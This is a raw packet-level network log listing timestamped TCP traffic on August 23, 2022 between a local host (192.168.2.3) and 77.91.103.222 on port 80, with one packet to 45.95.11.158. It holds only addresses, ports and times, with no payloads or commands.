Aug 23, 2022 18:24:03.395919085 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395940065 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395951033 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395955086 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395957947 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395977974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395998001 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396023035 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396029949 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396034002 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396037102 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396040916 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396070957 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396085024 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396106958 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396128893 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396150112 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396171093 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396193027 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396209002 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396213055 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396215916 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396229982 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396250963 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396275043 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396282911 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396286964 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396290064 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396292925 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396315098 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396327972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396361113 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396384001 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396404028 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396424055 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396428108 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396430969 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396440983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396462917 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396483898 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396500111 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396506071 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396511078 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396524906 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396541119 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396563053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396586895 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.396604061 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.396620035 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.397197008 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.397203922 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.401284933 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.410167933 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.410208941 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.410239935 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.410270929 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.410299063 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.410319090 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.410326004 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.410355091 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.410373926 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.410429001 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.410440922 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.413980961 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.414627075 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.416260958 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.416516066 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.417614937 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.417895079 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.417968988 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.418021917 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.418032885 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.418046951 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.418080091 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.418109894 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.418154955 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.418201923 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.418212891 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.418236971 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.418243885 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.418286085 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.419404984 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.419579983 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.420588017 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.420624018 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.420655966 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.420696974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.420742989 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.420752048 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.420757055 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.420783043 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.420816898 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.420928001 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.421031952 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.425138950 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.425237894 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.436964989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.436996937 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437042952 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437053919 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437077045 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437123060 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437155008 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437197924 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437225103 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437259912 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437271118 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437288046 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437309980 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437334061 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437355995 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437367916 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437372923 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437388897 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437412024 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437434912 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437457085 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437462091 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437483072 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437499046 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437514067 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437532902 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437551022 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437567949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437617064 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437642097 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437664032 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437686920 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437693119 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437695980 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437747002 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437777996 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437807083 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437834024 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437860966 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437870026 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437874079 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437876940 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437899113 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437922955 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437939882 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437943935 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437947989 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.437963009 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.437984943 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438005924 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438024998 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438046932 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438060999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438086987 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438098907 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438122034 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438147068 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438173056 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438195944 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438208103 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438211918 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438215017 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438236952 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438261986 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438277960 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438282013 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438297987 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438318014 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438338995 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438355923 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438360929 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438364029 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438378096 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438400984 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438421965 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438443899 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438471079 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438479900 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438484907 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438488960 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438505888 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438529968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438538074 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438560009 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438584089 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438604116 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438616037 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438621044 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438628912 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438678026 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438716888 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438743114 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438766003 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438771009 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438781023 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438803911 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438841105 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438853979 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438858986 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438862085 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438884020 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438908100 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438931942 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438956976 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438980103 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.438990116 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438994884 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.438997984 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439001083 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439023972 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439048052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439074039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439100027 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439107895 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439112902 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439135075 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439160109 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439182043 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439186096 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439188957 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439202070 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439225912 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439249039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439271927 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439291000 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439296007 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439297915 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439308882 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439327955 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439373970 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439388037 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439393044 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439397097 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439419985 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439445019 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439469099 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439492941 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439516068 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439527035 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439531088 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439533949 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439560890 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439582109 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439598083 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439623117 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439640999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439663887 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439691067 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439697981 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439702034 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439709902 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439730883 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439754009 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439774990 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439785004 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439788103 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439791918 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439811945 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439834118 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439850092 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439853907 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439857960 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439874887 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439899921 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439922094 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439945936 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439975023 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.439981937 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439985991 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439989090 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.439991951 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440012932 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440033913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440056086 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440064907 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440068960 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440090895 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440112114 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440134048 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440145016 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440150023 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440152884 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440174103 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440196037 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440217018 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440227985 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440232038 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440236092 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440239906 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440260887 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440283060 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440304995 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440316916 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440320969 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440345049 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440367937 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440390110 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440416098 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440440893 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440452099 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440457106 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440479994 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440500975 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440526962 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440545082 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440550089 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440552950 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440567970 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440593004 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440615892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440627098 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440630913 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440634012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440655947 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440679073 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440705061 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440716028 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440720081 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440722942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440747023 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440769911 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440793037 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440821886 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440829039 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440833092 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440835953 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440859079 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440884113 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440911055 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440917969 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440922022 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440924883 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440947056 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440970898 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.440985918 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440990925 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.440994978 CEST	49844	80	192.168.2.3	77.91.103.222
